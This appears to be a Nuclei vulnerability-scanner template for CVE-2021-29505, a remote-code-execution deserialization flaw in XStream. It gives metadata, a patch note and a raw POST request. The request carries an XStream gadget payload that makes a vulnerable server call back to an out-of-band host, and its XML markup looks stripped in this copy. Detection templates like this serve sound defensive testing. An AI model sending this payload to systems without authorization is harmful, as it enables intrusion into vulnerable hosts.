id: CVE-2021-29505 info: name: XStream <1.4.17 - Remote Code Execution author: pwnhxl severity: high description: | XStream before 1.4.17 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: Patched in 1.4.17. reference: - https://paper.seebug.org/1543/ - https://github.com/vulhub/vulhub/blob/master/xstream/CVE-2021-29505/README.zh-cn.md - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29505 - https://github.com/x-stream/xstream/security/advisories/GHSA-7chv-rrw6-w6fc - https://nvd.nist.gov/vuln/detail/cve-2021-29505 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-29505 cwe-id: CWE-502 epss-score: 0.03355 epss-percentile: 0.90358 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project product: xstream tags: oast,vulhub,cve,cve2021,xstream,deserialization,rce,xstream_project http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml 2 3 12345 com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content 12345 true SOAP_11 false aa aa UnicastRef {{interactsh-url}} 1099 0 0 0 0 false {{interactsh-url}} 1099 matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns" - type: word part: body words: - "timestamp" - "com.thoughtworks.xstream" condition: or - type: word part: header words: - "application/json" - type: status status: - 500 # digest: 4b0a00483046022100a2a040098bcfe81af516d2bb774c882306ff880850adfd589db68a6105f2d992022100c00d549beab826638c4df00a62f1760d9935e2aea60ca37d07281e0a7e44b476:922c64590222798bb761d5b6d8e72950